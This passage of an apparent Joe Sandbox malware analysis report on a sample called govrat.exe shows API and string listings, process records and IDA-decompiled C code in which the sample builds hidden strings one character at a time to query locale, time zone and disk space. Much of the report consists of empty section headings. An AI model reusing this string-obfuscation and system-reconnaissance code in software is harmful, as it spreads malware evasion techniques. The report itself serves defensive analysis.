0x00965b58
0x00000000
0x00965b5a

APIs

GetProcAddress.KERNEL32(00000000,?,00000000,00000000,?,00974D08), ref: 00965ADF
GetProcAddress.KERNEL32(00960300,?), ref: 00965B0F
GetProcAddress.KERNEL32(00960300,?), ref: 00965B45

Strings

ispl, xrefs: 00965AF8
rseD, xrefs: 00965AF1
cial, xrefs: 00965B29
erPa, xrefs: 00965B37
Shel, xrefs: 00965ACB
ayNa, xrefs: 00965AFF
Fold, xrefs: 00965B30
SHGe, xrefs: 00965B1B
thW, xrefs: 00965B3E
lIte, xrefs: 00965AD2
eate, xrefs: 00965AC4
SHPa, xrefs: 00965AEA
SHCr, xrefs: 00965ABD
tSpe, xrefs: 00965B22

Memory Dump Source

Source File: 00000001.00000002.13522191666.0000000000951000.00000020.sdmp, Offset: 00950000, based on PE: true

Associated: 00000001.00000002.13522181926.0000000000950000.00000002.sdmp
Associated: 00000001.00000002.13522276124.000000000096C000.00000002.sdmp
Associated: 00000001.00000002.13522298088.0000000000972000.00000004.sdmp
Associated: 00000001.00000002.13522386805.0000000000977000.00000020.sdmp
Associated: 00000001.00000002.13522767512.0000000000ACB000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_950000_govrat.jbxd

Function 00963E83, Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 239
library

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 71%

			E00963E83(struct HINSTANCE__* __eax, char __ebx, void* __edx, intOrPtr __edi, intOrPtr* __esi) {
				_Unknown_base(*)()* _t96;
				CHAR* _t98;
				_Unknown_base(*)()* _t100;
				short _t102;
				short _t104;
				short* _t105;
				short _t106;
				short _t110;
				short _t111;
				short _t112;
				short _t113;
				short _t114;
				short _t115;
				short _t116;
				short _t117;
				short _t118;
				short _t119;
				short _t120;
				short _t121;
				short _t122;
				short _t123;
				short _t124;
				short _t126;
				short _t127;
				short _t128;
				short _t129;
				short _t130;
				short _t132;
				short _t134;
				short _t135;
				short _t136;
				signed int _t139;
				short _t142;
				short _t144;
				short _t145;
				short _t146;
				short _t148;
				short _t149;
				short _t150;
				short _t151;
				void* _t156;
				void* _t157;
				void* _t160;
				char _t169;
				void* _t174;
				short _t176;
				intOrPtr* _t178;
				short* _t179;
				void* _t180;

				_t178 = __esi;
				_t175 = __edi;
				_t174 = __edx;
				_t169 = __ebx;
				_t96 = GetProcAddress(__eax, ??); // executed
				if(_t96 == 0) {
					L3:
					_t98 = _t180 - 0x3c;
					 *((char*)(_t180 - 0x58)) = 0x47;
					 *((char*)(_t180 - 0x57)) = _t169;
					 *((intOrPtr*)(_t180 - 0x56)) = 0x636f4c74;
					 *((short*)(_t180 - 0x52)) = 0x6c61;
					 *((char*)(_t180 - 0x50)) = _t169;
					 *((intOrPtr*)(_t180 - 0x4f)) = 0x6f666e49;
					 *((short*)(_t180 - 0x4b)) = 0x57;
					_t100 = GetProcAddress(L00A0C36C(), _t98); // executed
					 *(_t180 - 8) = _t100;
					_t102 =  *(_t180 - 8)(0x400, 0x59, _t175 + 0x518, 0x10, _t98, _t180 - 0x58);
					if(_t102 == 0) {
						 *((short*)(_t175 + 0x518)) = _t102;
					}
					_t104 =  *(_t180 - 8)(0x400, 0x5a, _t175 + 0x538, 0x10);
					if(_t104 == 0) {
						 *((short*)(_t175 + 0x538)) = _t104;
					}
					 *(_t180 - 8) =  *(_t180 - 8) & 0x00000000;
					if( *((intOrPtr*)(_t180 - 0x10)) != 0) {
						_t110 = 0x53;
						 *((short*)(_t180 - 0x214)) = _t110;
						_t111 = 0x45;
						 *((short*)(_t180 - 0x212)) = _t111;
						_t112 = 0x4c;
						 *((short*)(_t180 - 0x210)) = _t112;
						_t113 = 0x45;
						 *((short*)(_t180 - 0x20e)) = _t113;
						_t114 = 0x43;
						 *((short*)(_t180 - 0x20c)) = _t114;
						_t115 = 0x54;
						 *((short*)(_t180 - 0x20a)) = _t115;
						_t116 = 0x20;
						 *((short*)(_t180 - 0x208)) = _t116;
						_t117 = 0x2a;
						 *((short*)(_t180 - 0x206)) = _t117;
						_t118 = 0x20;
						 *((short*)(_t180 - 0x204)) = _t118;
						_t119 = 0x46;
						 *((short*)(_t180 - 0x202)) = _t119;
						_t120 = 0x52;
						 *((short*)(_t180 - 0x200)) = _t120;
						_t121 = 0x4f;
						 *((short*)(_t180 - 0x1fe)) = _t121;
						_t122 = 0x4d;
						 *((short*)(_t180 - 0x1fc)) = _t122;
						_t123 = 0x20;
						 *((short*)(_t180 - 0x1fa)) = _t123;
						_t124 = 0x57;
						_t176 = 0x69;
						 *((short*)(_t180 - 0x1f8)) = _t124;
						 *((short*)(_t180 - 0x1f6)) = _t176;
						_t126 = 0x6e;
						 *((short*)(_t180 - 0x1f4)) = _t126;
						_t127 = 0x33;
						 *((short*)(_t180 - 0x1f2)) = _t127;
						_t128 = 0x32;
						 *((short*)(_t180 - 0x1f0)) = _t128;
						_t129 = 0x5f;
						 *((short*)(_t180 - 0x1ee)) = _t129;
						_t130 = 0x54;
						 *((short*)(_t180 - 0x1ec)) = _t130;
						 *((short*)(_t180 - 0x1ea)) = _t176;
						_t132 = 0x6d;
						 *((short*)(_t180 - 0x1e8)) = _t132;
						 *((short*)(_t180 - 0x1e6)) = _t169;
						_t134 = 0x5a;
						 *((short*)(_t180 - 0x1e4)) = _t134;
						_t135 = 0x6f;
						 *((short*)(_t180 - 0x1e2)) = _t135;
						_t136 = 0x6e;
						 *((short*)(_t180 - 0x1e0)) = _t136;
						 *((short*)(_t180 - 0x1de)) = _t169;
						 *((short*)(_t180 - 0x1dc)) = 0;
						_t139 = E00951195(_t174, _t176, _t178, 0x2000); // executed
						 *(_t180 - 8) = _t139;
						 *_t178(_t180 - 0x28);
						_t142 = 0x44;
						 *((short*)(_t180 - 0x1b8)) = _t142;
						 *((short*)(_t180 - 0x1b6)) = _t169;
						_t144 = 0x73;
						 *((short*)(_t180 - 0x1b4)) = _t144;
						_t145 = 0x63;
						 *((short*)(_t180 - 0x1b2)) = _t145;
						_t146 = 0x72;
						 *((short*)(_t180 - 0x1b0)) = _t146;
						 *((short*)(_t180 - 0x1ae)) = _t176;
						_t148 = 0x70;
						 *((short*)(_t180 - 0x1ac)) = _t148;
						_t149 = 0x74;
						 *((short*)(_t180 - 0x1aa)) = _t149;
						_t150 = 0x6f;
						 *((short*)(_t180 - 0x1a6)) = _t150;
						_t151 = 0x6e;
						 *((short*)(_t180 - 0x1a4)) = _t151;
						 *((short*)(_t180 - 0x1a2)) = 0;
						 *((short*)(_t180 - 0x1a8)) = _t176;
						_t156 = E0095D2FF(_t169,  *((intOrPtr*)(_t180 - 0xc)), _t178, _t180 - 0x214, _t180 - 0x1b8, _t180 - 0x28); // executed
						if(_t156 != 0 &&  *((short*)(_t180 - 0x28)) == 8) {
							L00951604( *(_t180 - 8), 0xfff,  *((intOrPtr*)(_t180 - 0x20)));
						}
						_t157 = _t180 - 0x28;
						_push(_t157);
						_push(_t157); // executed
						L009E6735(); // executed
						_t175 =  *((intOrPtr*)(_t180 - 4));
					}
					_t105 = E00951195(_t174, _t175, _t178, 0xfffe); // executed
					_t179 = _t105;
					_push(_t179);
					_push(0x7ffe);
					_push(_t105);
					_t106 = L00A17B1C(_t105);
					if(_t106 == 0) {
						 *_t179 = _t106;
					}
					_push(_t180 - 0x7c);
					_push(_t180 - 0x3c);
					 *((char*)(_t180 - 0x7c)) = 0x47;
					 *((char*)(_t180 - 0x7b)) = _t169;
					 *((intOrPtr*)(_t180 - 0x7a)) = 0x73694474;
					 *((short*)(_t180 - 0x76)) = 0x466b;
					 *((char*)(_t180 - 0x74)) = 0x72;
					 *((char*)(_t180 - 0x73)) = _t169;
					 *((char*)(_t180 - 0x72)) = _t169;
					 *((intOrPtr*)(_t180 - 0x71)) = 0x63617053;
					 *((char*)(_t180 - 0x6d)) = _t169;
					 *((intOrPtr*)(_t180 - 0x6c)) = 0x577845;
					return L009BA5CA(_t180 - 0x3c);
				} else {
					_t160 =  *_t96(0, __edi + 0x390, 4, _t180 - 0x2c); // executed
					if(_t160 != 0) {
						goto L3;
					} else {
						 *((intOrPtr*)(__edi + 0x510)) =  *((intOrPtr*)( *((intOrPtr*)(_t180 - 0x2c)) + 0xc));
						L00951667(__edi + 0x410, 0x40,  *((intOrPtr*)( *((intOrPtr*)(_t180 - 0x2c)) + 0x24)), 0xffffffff);
						_push(_t180 - 0x30);
						_push( *((intOrPtr*)( *((intOrPtr*)(_t180 - 0x2c)) + 0x60)));
						return L00A122E0( *((intOrPtr*)(_t180 - 0x2c)), __edi);
					}
				}
			}

0x00963e83
0x00963e83
0x00963e83
0x00963e83
0x00963e84
0x00963e8c
0x00963ef2
0x00963ef6
0x00963efa
0x00963efe
0x00963f01
0x00963f08
0x00963f0e
0x00963f11
0x00963f18
0x00963f25
0x00963f2d
0x00963f3e
0x00963f43
0x00963f45
0x00963f45
0x00963f5c
0x00963f61
0x00963f63
0x00963f63
0x00963f6a
0x00963f72
0x00963f7a
0x00963f7d
0x00963f84
0x00963f87
0x00963f8e
0x00963f91
0x00963f98
0x00963f9b
0x00963fa2
0x00963fa5
0x00963fac
0x00963faf
0x00963fb6
0x00963fb9
0x00963fc0
0x00963fc3
0x00963fca
0x00963fcd
0x00963fd4
0x00963fd7
0x00963fde
0x00963fe1
0x00963fe8
0x00963feb
0x00963ff2
0x00963ff5
0x00963ffc
0x00963fff
0x00964006
0x00964009
0x0096400c
0x00964015
0x0096401c
0x0096401f
0x00964026
0x00964029
0x00964030
0x00964033
0x0096403a
0x0096403d
0x00964044
0x00964045
0x00964050
0x00964057
0x00964058
0x00964063
0x0096406a
0x0096406d
0x00964074
0x00964075
0x0096407e
0x0096407f
0x00964088
0x00964096
0x0096409d
0x009640a2
0x009640aa
0x009640ae
0x009640af
0x009640ba
0x009640c1
0x009640c4
0x009640cb
0x009640ce
0x009640d5
0x009640d6
0x009640e1
0x009640e8
0x009640eb
0x009640f2
0x009640f3
0x009640fc
0x009640fd
0x00964106
0x00964107
0x00964110
0x00964128
0x00964133
0x0096413d
0x00964151
0x00964156
0x00964159
0x0096415c
0x0096415d
0x0096415e
0x00964163
0x00964163
0x0096416b
0x00964171
0x00964173
0x00964174
0x00964179
0x0096417a
0x00964181
0x00964183
0x00964183
0x00964189
0x0096418d
0x0096418e
0x00964192
0x00964195
0x0096419c
0x009641a2
0x009641a6
0x009641a9
0x009641ac
0x009641b3
0x009641b6
0x009641c2
0x00963e8e
0x00963e9d
0x00963ea1
0x00000000
0x00963ea3
0x00963ea9
0x00963ec0
0x00963ecb
0x00963ecf
0x00963ed7
0x00963ed7
0x00963ea1

APIs

GetProcAddress.KERNEL32 ref: 00963E84
GetProcAddress.KERNEL32(00000000,?), ref: 00963F25

Strings

Info, xrefs: 00963F11
kF, xrefs: 0096419C
r, xrefs: 009641A2
Spac, xrefs: 009641AC
G, xrefs: 0096418E
ExW, xrefs: 009641B6
tDis, xrefs: 00964195
G, xrefs: 00963EFA
W, xrefs: 00963F18
tLoc, xrefs: 00963F01
al, xrefs: 00963F08

Memory Dump Source

Source File: 00000001.00000002.13522191666.0000000000951000.00000020.sdmp, Offset: 00950000, based on PE: true

Associated: 00000001.00000002.13522181926.0000000000950000.00000002.sdmp
Associated: 00000001.00000002.13522276124.000000000096C000.00000002.sdmp
Associated: 00000001.00000002.13522298088.0000000000972000.00000004.sdmp
Associated: 00000001.00000002.13522386805.0000000000977000.00000020.sdmp
Associated: 00000001.00000002.13522767512.0000000000ACB000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_950000_govrat.jbxd

Function 00963ED8, Relevance: 21.2, APIs: 1, Strings: 11, Instructions: 218
library

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(00000000,?), ref: 00963F25

Strings

Info, xrefs: 00963F11
kF, xrefs: 0096419C
r, xrefs: 009641A2
Spac, xrefs: 009641AC
G, xrefs: 0096418E
ExW, xrefs: 009641B6
tDis, xrefs: 00964195
G, xrefs: 00963EFA
W, xrefs: 00963F18
tLoc, xrefs: 00963F01
al, xrefs: 00963F08

Memory Dump Source

Source File: 00000001.00000002.13522191666.0000000000951000.00000020.sdmp, Offset: 00950000, based on PE: true

Associated: 00000001.00000002.13522181926.0000000000950000.00000002.sdmp
Associated: 00000001.00000002.13522276124.000000000096C000.00000002.sdmp
Associated: 00000001.00000002.13522298088.0000000000972000.00000004.sdmp
Associated: 00000001.00000002.13522386805.0000000000977000.00000020.sdmp
Associated: 00000001.00000002.13522767512.0000000000ACB000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_950000_govrat.jbxd

Function 0095355D, Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 42
library

Control-flow Graph

Executed
Not Executed

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report

Overview

General Information

Detection

Confidence

Classification

Signature Overview

Networking:

Persistence and Installation Behavior:

Data Obfuscation:

Spreading:

System Summary:

HIPS / PFW / Operating System Protection Evasion:

Anti Debugging:

Malware Analysis System Evasion:

Hooking and other Techniques for Hiding and Protection:

Language, Device and Operating System Detection:

Behavior Graph

Simulations

Behavior and APIs

Antivirus Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

Yara Overview

Initial Sample

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Screenshots

Startup

Created / dropped Files

Contacted Domains/Contacted IPs

Contacted Domains

Contacted IPs

Static File Info

General

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Exports

Version Infos

Possible Origin

Network Behavior

TCP Packets

HTTP Request Dependency Graph

HTTP Packets

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Behavior

System Behavior

Analysis Process: govrat.exe PID: 3676 Parent PID: 3216

General

Chronological Activities

Analysis Process: explorer.exe PID: 3948 Parent PID: 3188

General

Chronological Activities

Analysis Process: explorer.exe PID: 1212 Parent PID: 752

General

Chronological Activities

Analysis Process: ASC.exe PID: 3812 Parent PID: 1212

General

Function 00965B62, Relevance: 128.0, APIs: 13, Strings: 60, Instructions: 209
library

Function 00960762, Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 101
library

Function 0095FE2E, Relevance: 9.1, APIs: 6, Instructions: 99
library

Function 009641C3, Relevance: 3.9, APIs: 2, Instructions: 898
libraryCrypto

Function 00965F07, Relevance: 42.1, APIs: 6, Strings: 18, Instructions: 74
library

Function 00965A5F, Relevance: 29.8, APIs: 3, Strings: 14, Instructions: 81
library

Function 00963E83, Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 239
library

Function 00963ED8, Relevance: 21.2, APIs: 1, Strings: 11, Instructions: 218
library

Function 0095355D, Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 42
library